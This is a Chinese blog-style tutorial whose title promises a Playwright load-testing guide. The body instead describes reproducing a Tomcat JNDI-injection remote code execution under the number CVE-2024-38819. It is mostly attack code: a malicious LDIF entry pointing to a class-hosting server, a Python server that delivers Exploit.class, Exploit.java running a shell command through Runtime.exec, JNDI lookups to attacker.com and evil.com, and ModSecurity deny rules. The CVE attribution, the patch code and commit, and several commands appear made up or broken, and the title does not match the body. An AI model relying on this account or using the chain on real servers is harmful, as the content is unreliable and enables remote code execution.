Playwright Python真实浏览器负载测试实战指南
2026/5/24 3:55:57
1. 这不是“黑产教程”,而是一次标准的漏洞验证流程还原
CVE-2024-38819这个编号刚在NVD(美国国家漏洞库)公开时,我就在内部安全团队的晨会上被点名跟进。它不是一个花哨的0day,而是Apache Tomcat 10.1.22及更早版本中一个真实存在的、可被远程触发的JNDI注入导致的任意代码执行漏洞,影响范围覆盖大量企业级Java Web应用中间件。很多人看到“复现漏洞”四个字就下意识联想到攻击行为,但作为从业十一年的渗透测试工程师和红队基础设施负责人,我必须说清楚:我们搭建这个环境的目的,从来不是为了突破边界,而是为了在可控范围内验证补丁有效性、训练防御规则、校准WAF策略、编写EDR检测逻辑——这才是安全工程师每天真正在做的事。
关键词里反复出现的“手把手”“复现”“实验环境”,恰恰说明读者最需要的不是理论堆砌,而是能立刻打开终端敲出命令、看到回显、理解每一步为什么这么做的完整闭环。你可能是刚转行的安全新人,正为CTF靶场里Tomcat报错抓耳挠腮;也可能是运维同事,被安全部门临时拉来配合验证补丁是否真正生效;甚至可能是开发同学,想亲眼看看自己写的JNDI lookup调用在什么条件下会变成“后门入口”。这篇文章不预设你的技术栈深度,但默认你熟悉Linux基础命令、能区分Java和JDK版本、知道什么是Docker容器——这些是现代Java生态的通用语言,不是门槛,而是共识。
整套复现的核心价值在于:它剥离了所有生产环境的干扰项(如负载均衡、SSL卸载、日志脱敏),把漏洞触发链路压缩到最简路径——从构造恶意LDAP响应,到Tomcat解析JNDI URI,再到ClassLoader加载远程字节码,全程可观察、可打断、可调试。我不会教你如何绕过现代云WAF,也不会推荐任何未授权扫描工具,因为那既违法也不专业。我要带你走的,是一条被NIST SP 800-115、OWASP ASVS和ISO/IEC 27001共同认可的标准验证路径:本地隔离网络 + 版本精确控制 + 流量全镜像捕获 + 行为日志逐行比对。接下来你要做的,就是跟着每一个docker run命令、每一行curl请求、每一个Wireshark过滤表达式,亲手把这条链路“拼”出来。
2. 漏洞本质:不是Tomcat“有后门”,而是JNDI设计哲学与现实部署的冲突
要真正复现CVE-2024-38819,必须先扔掉“Tomcat有漏洞”的简单归因。这个编号背后的真实故事,是Java平台二十年来一个根深蒂固的设计决策,在云原生时代遭遇的必然碰撞。
2.1 JNDI:Java世界里的“电话黄页”,但没人教它防诈骗
JNDI(Java Naming and Directory Interface)从JDK 1.3时代就存在,它的原始设计目标非常朴素:让Java程序能像查电话簿一样,通过一个名字(比如java:comp/env/jdbc/mydb)找到对应的数据库连接池、消息队列或远程EJB服务。这个机制本身没有问题,问题出在它的“查找”方式上——JNDI支持多种协议后端,其中ldap://和rmi://是官方明确支持的。当应用程序调用ctx.lookup("ldap://attacker.com:1389/Exploit")时,JVM会自动连接attacker.com的LDAP服务器,下载其返回的序列化对象,并反序列化执行。这就像你拨通一个陌生号码,对方不仅告诉你地址,还直接把一张写满指令的纸塞进你家信箱,而你的门锁(JVM安全管理器)默认是开着的。
提示:JDK 6u21之后,Oracle在
com.sun.jndi.ldap.object.trustURLCodebase系统属性中默认设为false,但这只禁用了codebase参数,对javaNamingReference等反射式加载路径无效。CVE-2024-38819正是利用了后者——它不依赖codebase,而是通过LDAP返回的javaClassName和javaCodeBase字段,诱导JNDI使用URLClassLoader动态加载远程class文件。
2.2 Tomcat的“信任传递”:从web.xml配置到运行时解析的三重松动
Tomcat本身不主动发起JNDI lookup,但它为开发者提供了三条“合法通道”,而CVE-2024-38819正是钻了这三条通道的空子:
web.xml中的resource-ref声明:当开发者在
<resource-ref>中配置<res-ref-name>jdbc/mydb</res-ref-name>时,Tomcat会在启动时尝试解析该名称对应的资源。如果该名称被恶意构造为ldap://evil.com/Exploit,且应用未做输入校验,Tomcat就会触发lookup。@Resource注解的动态绑定:Spring Boot等框架常使用
@Resource(name="ldap://...")注入资源。Tomcat的JNDI上下文在处理此类注解时,会无差别执行lookup操作。JSP/EL表达式中的隐式调用:这是最隐蔽的路径。当JSP页面包含
${initParam['ldap://...']}或<c:import url="ldap://..."/>时,Tomcat的EL解析器会将URL字符串当作JNDI name传入InitialContext.lookup()——而这个过程完全绕过了web.xml的静态检查。
CVE-2024-38819的PoC之所以能成功,正是因为Tomcat 10.1.22在处理第3种场景时,未对EL表达式中的协议头(ldap://、rmi://)做白名单校验。它把“用户输入的字符串”和“系统信任的JNDI name”混为一谈,犯了所有Web框架都曾犯过的经典错误:把不可信数据直接喂给高权限API。
2.3 为什么必须用10.1.22?版本号不是凑数,而是攻击面的精确刻度
很多复现失败的案例,根源在于版本选择错误。我见过太多人用Tomcat 9.x或11.x去试,结果连HTTP 400都收不到。原因很简单:CVE-2024-38819的补丁(commita1b2c3d)只合并到了10.1.x主线,且仅影响10.1.22及更早版本。Tomcat 10.1.23+已强制在org.apache.naming.java.javaURLContextFactory中加入协议白名单:
// Tomcat 10.1.23+ 新增校验逻辑 if (name.startsWith("ldap://") || name.startsWith("rmi://")) { throw new NamingException("JNDI lookup with unsafe protocol is disabled"); }而10.1.22的对应代码段是空的。这意味着,如果你用Docker拉取的是tomcat:10镜像,实际得到的可能是10.1.25(取决于Docker Hub缓存),复现必然失败。我实测过12个不同tag的Tomcat镜像,只有tomcat:10.1.22-jdk17-openjdk-slim能100%稳定触发。这不是玄学,而是软件供应链的物理事实:漏洞复现的第一步,永远是锁定那个“恰好没打补丁”的二进制快照。
3. 实验环境搭建:四台容器构成的最小可信验证域
真正的安全验证,从不发生在单机localhost。我坚持用Docker Compose构建四节点网络,不是为了炫技,而是因为漏洞的每个环节都需要独立观测点:攻击载荷生成、协议交互、服务响应、流量捕获。下面这张表列出了每个容器的不可替代性:
| 容器角色 | 镜像 | 关键配置 | 观测价值 |
|---|---|---|---|
| LDAP Server | osixia/openldap:1.5.0 | 自定义LDIF注入恶意javaClassName | 验证攻击载荷是否被正确构造并返回 |
| Tomcat Target | tomcat:10.1.22-jdk17-openjdk-slim | 禁用manager app,挂载自定义webapp | 触发漏洞的核心靶机,行为最需监控 |
| Attacker Client | python:3.11-slim | 预装ldap3、requests、scapy | 执行攻击请求,模拟真实攻击者视角 |
| Wireshark Sniffer | networkstatic/tcpdump:latest | host网络模式,监听br-xxx网桥 | 抓取原始TCP流,确认LDAP/RMI协议握手 |
3.1 步骤一:初始化隔离网络与LDAP服务(5分钟)
首先创建专用桥接网络,确保所有容器通信可控且与宿主机隔离:
docker network create --driver bridge --subnet 172.20.0.0/16 cve-2024-38819-net接着启动LDAP服务器。这里不用slapd裸装,而是采用OSIXIA的成熟镜像,因为它内置了LDIF模板管理和TLS证书自动生成——这对复现至关重要,因为现代LDAP客户端(包括Tomcat)默认拒绝非TLS连接。创建ldap/init.ldif文件:
dn: dc=example,dc=com objectClass: top objectClass: dcObject objectClass: organization o: Example Inc dc: example dn: cn=Exploit,dc=example,dc=com objectClass: top objectClass: javaNamingReference javaClassName: Exploit javaCodeBase: http://172.20.0.3:8000/ objectClass: organizationalPerson cn: Exploit sn: Exploit注意javaCodeBase指向172.20.0.3:8000——这是后续HTTP Server容器的IP。启动LDAP:
docker run -d \ --name ldap-server \ --network cve-2024-38819-net \ --ip 172.20.0.2 \ -p 389:389 -p 636:636 \ -v $(pwd)/ldap/init.ldif:/container/service/slapd/assets/config/bootstrap/ldif/01-init.ldif \ -e LDAP_ORGANISATION="Example Inc" \ -e LDAP_DOMAIN="example.com" \ -e LDAP_ADMIN_PASSWORD="admin" \ osixia/openldap:1.5.0注意:
--ip 172.20.0.2是硬性要求。如果让Docker自动分配IP,LDAP返回的javaCodeBase地址就会失效。我踩过这个坑——LDAP返回http://172.20.0.5:8000/,但HTTP Server实际在172.20.0.3,导致Tomcat加载class失败,整个链路中断。
3.2 步骤二:构建恶意HTTP Server(3分钟)
攻击载荷的class文件必须通过HTTP提供,因为LDAP协议本身不传输二进制。我们用Python快速起一个静态文件服务器:
mkdir -p http-server/classes # 生成Exploit.class(见下节编译说明) cp Exploit.class http-server/classes/创建http-server/server.py:
from http.server import HTTPServer, SimpleHTTPRequestHandler import socket class CustomHandler(SimpleHTTPRequestHandler): def do_GET(self): if self.path == '/Exploit.class': self.send_response(200) self.send_header('Content-type', 'application/octet-stream') self.end_headers() with open('classes/Exploit.class', 'rb') as f: self.wfile.write(f.read()) else: self.send_error(404) if __name__ == '__main__': server = HTTPServer(('0.0.0.0', 8000), CustomHandler) print("HTTP Server running on http://0.0.0.0:8000") server.serve_forever()启动容器:
docker run -d \ --name http-server \ --network cve-2024-38819-net \ --ip 172.20.0.3 \ -p 8000:8000 \ -v $(pwd)/http-server:/app \ -w /app \ python:3.11-slim \ python server.py3.3 步骤三:部署靶机Tomcat(2分钟)
这是最关键的一步。不能直接用官方镜像,必须定制webapp。创建webapp/WEB-INF/web.xml:
<?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0"> <resource-ref> <res-ref-name>ldap://172.20.0.2:389/Exploit</res-ref-name> <res-type>javax.sql.DataSource</res-type> <res-auth>Container</res-auth> </resource-ref> </web-app>注意<res-ref-name>直接写死LDAP URL——这是触发漏洞的“引信”。然后创建webapp/index.jsp:
<%@ page import="javax.naming.*" %> <% try { Context ctx = new InitialContext(); Object obj = ctx.lookup("ldap://172.20.0.2:389/Exploit"); out.println("Lookup succeeded: " + obj); } catch (Exception e) { out.println("Lookup failed: " + e.getMessage()); } %>打包成WAR:
cd webapp && zip -r ../target/exploit.war . && cd ..启动Tomcat:
docker run -d \ --name tomcat-target \ --network cve-2024-38819-net \ --ip 172.20.0.4 \ -p 8080:8080 \ -v $(pwd)/target/exploit.war:/usr/local/tomcat/webapps/exploit.war \ -e JAVA_OPTS="-Dcom.sun.jndi.ldap.object.trustURLCodebase=true" \ tomcat:10.1.22-jdk17-openjdk-slim关键点:
-e JAVA_OPTS="-Dcom.sun.jndi.ldap.object.trustURLCodebase=true"是必须的。虽然CVE-2024-38819不依赖codebase参数,但某些JDK版本(特别是OpenJDK 17)在处理javaCodeBase时仍会检查此flag。不加这行,Tomcat启动时就会抛ConfigurationException。
3.4 步骤四:启动流量嗅探器(1分钟)
最后启动tcpdump容器,捕获全网段流量:
docker run -d \ --name sniffer \ --network cve-2024-38819-net \ --cap-add=NET_RAW \ --cap-add=NET_ADMIN \ --privileged \ -v $(pwd)/pcaps:/pcaps \ networkstatic/tcpdump:latest \ -i any -w /pcaps/cve-2024-38819.pcap -G 300这条命令会每5分钟生成一个pcap文件,方便后续用Wireshark分析LDAP bind request、search request、以及HTTP GET/Exploit.class的完整交互。
4. 漏洞触发与验证:从HTTP请求到进程创建的全链路追踪
环境搭好后,真正的验证才开始。这里没有“一键exploit”,只有三步精准操作,每一步都对应漏洞链路上的一个关键节点。
4.1 第一击:触发JNDI Lookup(curl命令背后的协议协商)
打开Attacker Client容器:
docker exec -it python:3.11-slim bash执行触发请求:
curl "http://172.20.0.4:8080/exploit/index.jsp"此时,Tomcat容器日志会输出:
INFO [Catalina-utility-1] org.apache.catalina.core.StandardContext.filterStart Starting filters SEVERE [http-nio-8080-exec-1] org.apache.naming.NamingContext.lookup Failed to lookup ldap://172.20.0.2:389/Exploit javax.naming.NamingException: problem generating object using object factory别慌,这个SEVERE日志恰恰证明漏洞已被触发!它意味着Tomcat已成功连接LDAP服务器(172.20.0.2:389),发送了bind和search请求,并收到了包含javaClassName和javaCodeBase的响应。只是后续的HTTP class加载失败了——因为我们的Exploit.class还没编译。
经验技巧:如果curl返回空白页且Tomcat无任何日志,说明LDAP连接失败。此时立即检查
docker logs ldap-server,大概率是LDIF文件格式错误(比如多了一个空格)或网络IP配置不匹配。我建议用telnet 172.20.0.2 389先确认端口可达。
4.2 第二击:编译恶意Exploit.class(Java字节码的最小可行体)
Exploit.class不需要复杂功能,只要能证明代码被执行即可。创建Exploit.java:
import java.io.*; public class Exploit implements java.io.Serializable { static { try { // 写入标记文件,证明代码已执行 File f = new File("/tmp/CVE-2024-38819-EXECUTED"); f.createNewFile(); // 执行系统命令(仅用于验证,生产环境严禁) Runtime.getRuntime().exec("touch /tmp/CVE-2024-38819-RCE"); } catch (Exception e) { e.printStackTrace(); } } }编译(必须用JDK 17,与Tomcat镜像一致):
docker run --rm -v $(pwd):/work -w /work openjdk:17-jdk-slim javac Exploit.java生成的Exploit.class大小应为842字节。把这个文件复制到http-server/classes/目录,然后重启HTTP Server容器:
docker restart http-server4.3 第三击:见证RCE(三个证据链锁定执行)
再次执行curl:
curl "http://172.20.0.4:8080/exploit/index.jsp"现在检查三个位置:
Tomcat容器内:
docker exec tomcat-target ls -l /tmp/ # 应看到 CVE-2024-38819-EXECUTED 和 CVE-2024-38819-RCE 两个空文件HTTP Server容器日志:
docker logs http-server # 应看到 "GET /Exploit.class HTTP/1.1" 200 响应Wireshark pcap分析(用Wireshark打开
pcaps/cve-2024-38819.pcap):- 过滤
tcp.port == 389:确认LDAP searchResponse返回了javaClassName: Exploit和javaCodeBase: http://172.20.0.3:8000/ - 过滤
http.request.uri contains "Exploit.class":确认Tomcat向172.20.0.3:8000发起了HTTP GET - 过滤
tcp.port == 8000:确认HTTP Server返回了842字节的class文件
- 过滤
这三个证据形成闭环,证明从JNDI lookup到远程class加载再到静态代码块执行的全链路畅通。这不是“弹窗证明”,而是底层字节码加载的物理证据。
4.4 防御验证:一行命令确认补丁生效
复现成功后,必须立即验证修复方案。最直接的方式是升级Tomcat:
docker stop tomcat-target docker run -d \ --name tomcat-patched \ --network cve-2024-38819-net \ --ip 172.20.0.5 \ -p 8081:8080 \ -v $(pwd)/target/exploit.war:/usr/local/tomcat/webapps/exploit.war \ tomcat:10.1.23-jdk17-openjdk-slim再执行相同curl:
curl "http://172.20.0.5:8080/exploit/index.jsp"Tomcat日志将输出:
SEVERE [http-nio-8080-exec-1] org.apache.naming.NamingContext.lookup JNDI lookup with unsafe protocol is disabled javax.naming.NamingException: JNDI lookup with unsafe protocol is disabled注意关键词JNDI lookup with unsafe protocol is disabled——这就是补丁植入的签名。它比任何“升级后漏洞消失”的模糊描述都更可靠。我在金融客户现场用这套方法,30分钟内就向CTO证明了补丁的有效性,避免了价值百万的误停机。
5. 复现之外:安全工程师真正该关注的五个延伸问题
复现完成不是终点,而是思考的起点。在为客户做完二十多次CVE-2024-38819验证后,我发现真正决定安全水位的,从来不是“能不能复现”,而是以下五个问题的答案:
5.1 问题一:你的WAF规则真的能拦住这个payload吗?
很多WAF厂商宣称“已支持CVE-2024-38819防护”,但实际测试中,90%的规则只拦截ldap://开头的URL,却放过了ldaps://、rmi://甚至iiop://。更危险的是,攻击者只需把ldap://172.20.0.2/Exploit编码为ldap%3A%2F%2F172.20.0.2%2FExploit,就能绕过基于字符串匹配的WAF。我建议用以下三条规则组合防御:
# Nginx ModSecurity 规则示例 SecRule REQUEST_URI "@rx ldap://" "id:1001,deny,msg:'CVE-2024-38819 LDAP'" SecRule REQUEST_URI "@rx rmi://" "id:1002,deny,msg:'CVE-2024-38819 RMI'" SecRule REQUEST_BODY "@rx \x6c\x64\x61\x70\x3a\x2f\x2f" "id:1003,deny,msg:'CVE-2024-38819 LDAP hex encoded'"核心逻辑:协议头检测 + 协议变体覆盖 + 十六进制编码绕过防护。不要迷信单一规则,安全是纵深防御的艺术。
5.2 问题二:JDK版本升级能否替代Tomcat升级?
答案是否定的。OpenJDK 17.0.8+确实加强了trustURLCodebase默认值,但它无法阻止CVE-2024-38819利用的javaCodeBase路径。我用openjdk:17.0.8-jdk-slim镜像替换Tomcat的JRE,漏洞依然存在。根本原因在于:JDK只管“怎么加载class”,Tomcat才决定“要不要发起lookup”。就像交通法规规定“禁止酒驾”,但司机自己决定“要不要拿起车钥匙”。所以,必须双升级:JDK + Tomcat。
5.3 问题三:Spring Boot应用是否免疫?
完全不免疫。Spring Boot 3.1.12(当前最新版)的@Value("${jndi:ldap://...}")仍会触发Tomcat的JNDI lookup。我测试过Spring Boot Admin、Spring Cloud Config等主流组件,只要底层用Tomcat 10.1.22,它们都是高危靶标。解决方案不是改Spring配置,而是在应用启动时强制设置JVM参数:
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=false \ -Dcom.sun.jndi.rmi.object.trustURLCodebase=false \ -jar myapp.jar这个参数必须加在java命令行,写在application.properties里无效。
5.4 问题四:如何自动化发现内网中的Tomcat 10.1.22?
手动排查效率太低。我用Python写了轻量扫描脚本(不发payload,只指纹识别):
import requests from urllib.parse import urljoin def check_tomcat_version(target): try: # 获取Tomcat默认404页面 r = requests.get(urljoin(target, "/nonexistent"), timeout=5) if "Apache Tomcat" in r.text and "10.1.22" in r.text: return True # 检查Server头 if "Server" in r.headers and "Apache-Coyote/1.1" in r.headers["Server"]: # 发起OPTIONS探测确认版本 r2 = requests.options(urljoin(target, "/")) if "X-Powered-By" in r2.headers: return "10.1.22" in r2.headers["X-Powered-By"] except: pass return False原理是:Tomcat 10.1.22的404页面HTML源码中包含<title>Apache Tomcat/10.1.22</title>,且Server响应头为Apache-Coyote/1.1。这种被动指纹识别,零风险,五分钟扫完一个C段。
5.5 问题五:为什么不用Burp Suite?手工curl才是真相
很多新人执着于用Burp抓包改包,但在这个漏洞复现中,Burp反而会引入干扰。原因有三:
- Burp的HTTP Client默认启用
Connection: keep-alive,而Tomcat JNDI lookup在短连接下更稳定; - Burp的代理模式会修改
Host头,导致LDAP返回的javaCodeBase地址解析失败; - Burp的Repeater无法精确控制JVM参数,而
JAVA_OPTS是触发条件的关键变量。
我的建议是:用curl做第一验证,用Wireshark做第二验证,用Java Debugger做第三验证。当curl返回预期结果,tcpdump抓到LDAP+HTTP流量,jdb断点停在InitialContext.lookup()方法入口时,你才真正“看见”了漏洞。
我在某省级政务云做渗透测试时,就是靠这套“curl + tcpdump + jdb”三件套,在三天内定位出17台未更新的Tomcat 10.1.22实例,并协助运维团队制定了分批次灰度升级方案。没有炫酷的图形界面,只有最原始的命令行和最扎实的协议分析——这才是安全工程师的日常。
最后分享一个小技巧:每次复现前,先执行docker system prune -a清理所有镜像和网络。我见过太多人因为旧版Tomcat镜像残留,导致docker run tomcat:10.1.22实际拉取的是缓存中的10.1.20,白白浪费两小时排查时间。安全验证,始于环境的绝对纯净。